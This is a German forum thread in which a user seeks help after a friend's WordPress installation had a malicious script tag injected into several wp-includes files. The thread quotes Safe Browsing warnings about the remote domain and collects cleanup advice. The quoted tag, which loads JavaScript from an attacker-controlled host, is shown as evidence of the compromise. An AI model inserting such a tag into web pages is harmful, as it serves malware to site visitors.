Hallo,
heute sagte mir mein Bekannter, dass er eine Fehlermeldung bekam, als er seinen Wordpress-Blog aufrufen wollte. Vielleicht ist der folgende Sachverhalt wichtig um die Verbreitung von Malware zu verhindern. Als er an der betreffenden Stelle nach dem Fehler schaute, fand er dort ein unbekanntes Script.

Code: Alles auswählenAufklappen

ATTFilter

<script type="text/javascript" src="h***://addonrock.ru/OCR.js"></script>
<!--c9168d0ef49443a787ad05c469485c26-->
         

Auch stellte er fest, dass in dem "wp-includes"-Ordner vier Dateien zum gleichen Zeitpunkt geändert wurden. In allen Dateien befand sich der oben aufgeführte Quellcode. Geändert wurden im oben benannten Ordner:
- default-constants.php
- default-embeds.php
- default-filters.php
- default-widgets.php

Wenn man die im Quellcode benannte Domain öffnen will, dann kommt bei mir eine Fehlermeldung:

Zitat:

Als attackierend gemeldete Website!

Die Website auf addonrock.ru wurde als attackierende Seite gemeldet und auf Grund Ihrer Sicherheitseinstellungen blockiert.

Attackierende Websites versuchen, Programme zu installieren, die private Informationen stehlen, Ihren Computer verwenden, um andere zu attackieren oder Ihr System beschädigen.

Manche Websites vertreiben bewusst Viren und ähnlich schädliche Software, aber viele Websites sind auch ohne das Wissen oder die Erlaubnis des Betreibers kompromittiert.

Wenn man dort auf das Button "warum wurde diese Seite blockiert?" klickt, kommt folgende Information:

Zitat:

Wie ist die gegenwärtige Einstufung von addonrock.ru?

Diese Website ist als verdächtig eingestuft. Das Aufrufen dieser Website kann schädlich für Ihren Computer sein!

Ein Bestandteil dieser Website wurde in den letzten 90 Tagen 1 mal aufgrund verdächtiger Aktivitäten auf die Liste gesetzt.

Welche Befunde hat Google beim Besuch dieser Website festgestellt?

Bei 0 Seite(n) von insgesamt 12 Seiten dieser Website, die wir in den letzten 90 Tagen getestet haben, wurde festgestellt, dass Malware (Schadsoftware) ohne Einwilligung des Nutzers heruntergeladen und installiert wurde. Der letzte Besuch von Google auf dieser Website war am 2010-09-17 und in den letzten 90 Tagen wurde auf dieser Website kein verdächtiger Content gefunden.

Malicious software includes 17 trojan(s), 6 exploit(s).

This site was hosted on 9 network(s) including AS14929 (VITELITY), AS15830 (TELECITY), AS33823 (GEMENII).

Hat diese Website als Überträger zur Weiterverteilung von Malware fungiert?

In den letzten 90 Tagen hat addonrock.ru offenbar als Überträger für die Infektion von 12 Website(s) fungiert, darunter abcmoney2010.com/, varahaschool.com/, naturallove.co.kr/.

Hat diese Website Malware gehostet?

Nein, diese Website hat in den letzten 90 Tagen keine Malware gehostet.

Wie kam es zu dieser Einstufung?

Gelegentlich wird von Dritten bösartiger Code in legitime Websites eingefügt. In diesem Fall wird unsere Warnmeldung angezeigt.

Nächste Schritte:

* Zur vorherigen Seite zurückkehren.
* Falls Sie Eigner dieser Website sind, können Sie eine Überprüfung Ihrer Website mit den Google Webmaster-Tools anfordern. Weitere Informationen über den Prüfprozess erhalten Sie in der Hilfe für Webmaster.

Jetzt meine Fragen zu diesem Sachverhalt. Kann jemand hilfreiche Angeben machen? Um was handelt es sich hier genau? Reicht es wenn oben benannter Quellcode aus den Dateien entfernt wird, um schädlichen Einfluss zu unterbinden? Wie funktioniert es, dass Dritte den Dateien einfach ein Code beigefügen können?

Vielen Dank bereit für eine Antwort und schonmal ein schönes Wochenende!


Stabilo

ist denn wortpress und evtl. andres instaliertes zeug alles auf dem neuesten stand? ist der pc des bekannten malware frei?
waren die passwörter eher einfach oder komplex?

Rechner müsste eigentlich Malwarefrei sein. (Frage nochmal nach)
Die Passwörter sind eigentlich komplex. Ich glaube er verwaltet und generiert diese mit Keypass.
Wordpress aktualisiert er eigentlich auch immer sofort.

Laut diesem google-Safe Browsing sind davon ja scheinbar mehrere/viele Seiten betroffen.

deswegen denke ich ja an ne sicherheitslücke. evtl. auch serverseitig, wenn er nicht der admin ist, sollte er evtl. mal nach fragen.
passwörter auf jeden fall endern. vllt die zugriffsrechte für dateien und verzeichnisse einschrenken
Sicherheits-Checkliste für Webmaster - Google Webmaster-Zentrale Blog
hoffe dein bekannter spricht auch englisch, da gibts einiges an tipps
über die logs könnte man vllt auch was raus finden wies elaufen ist

geändert, weil frage erledigt

die sollten auf dem server deines bekannten sein, müsste er eig wissen, außer er ist vllt gemietet, da kann es sein das er keinen zugriff hatt, das kann ich dir net sagen, deswegen soll er sich ja mal mit dem suport auseinander setzen ob die vllt wissen obs serverseitig lücken gibt

Gut, dann erstmal vielen Dank für die Hilfe!

So, wollte mich noch einmal kurz wegen dem oben beschriebenen Sachverhalt melden. Mein Bekannter hatte auch einen "Bank-Trojaner" auf dem Rechner. Sein System hat er neu aufgespielt, scheinbar hat er jedoch nicht schnell genug alle Passwörter geändert gehabt. Aus allen Seiten, an denen er gearbeitet hat tauchen die benannten Scripte auf.

Was schlagt ihr im Fall Wordpress vor? Reicht es aus, wenn man alle Daten vom Server löscht, dann die Passwörter vom Server erneut ändert, Wordpress neu aufspielt? Kann man dabei die gleiche Datenbank benutzen oder können sich in einer Datenbank auch Malware-Scripte verstecken?

Wie wird man denn am besten mit diesen Sche**-Dingern fertig? Wo gibt es mehr Informationen zu solcehn Trojanern, bzw wie sie funktionieren? Könnte mein Bekannter ggf. den Trojaner von mir bekommen haben (hatte einen Beitrag gepostet wegen einer Tanabfrage bei der Volksbank und dort auch alle Scanberichte beigefügt)?

Hab langsam auch die Schnauze voll von der Technik. Ich glaube ich kaufe mir morgen eine Schreibmaschine...

ja, löschen und dann den inhalt neu einspielen, passwörter endern natürlich und evtl. den link den ich dir gegeben hab durchlesen, da gibts noch weitere tipps.
solche trojaner verbreiten sich nicht über netzwerkfreigaben usw. wenn du ihm aber ne datei gegeben hast die fragwürdig ist, dann könnte das schon klappen.
ich hatte dir doch tipps zum absichern gegeben glaube ich, die kann er umsetzen auf dem pc

Mit den Tipps funktioniert das soweit auch. Habe das bei mir auf dem Zweitrechner alles soweit eingestellt. MIt der Sandbox habe ich jedoch hin und wieder Probleme. Z.b. Habe ich Filezilla in der Sandbock freigegeben, bekomme aber immer eine Meldung, wenn ich mit zum Server verbinden möchte. Die Meldung sagt aber nur aus, dass es Probleme mit der Freigabe gibt. Was jedoch freigegeben werden soll nicht.

Macht es Sinn zusätzlich eine Firewall zu installieren, in welcher als einzige Programm die Sandbox freigegeben wird?

nein, das macht keinen sinn.
hmm kann dir da grad auch nicht weiter helfen, aber filezilla sollte eig auch außerhalb der sandbox kein problem sein.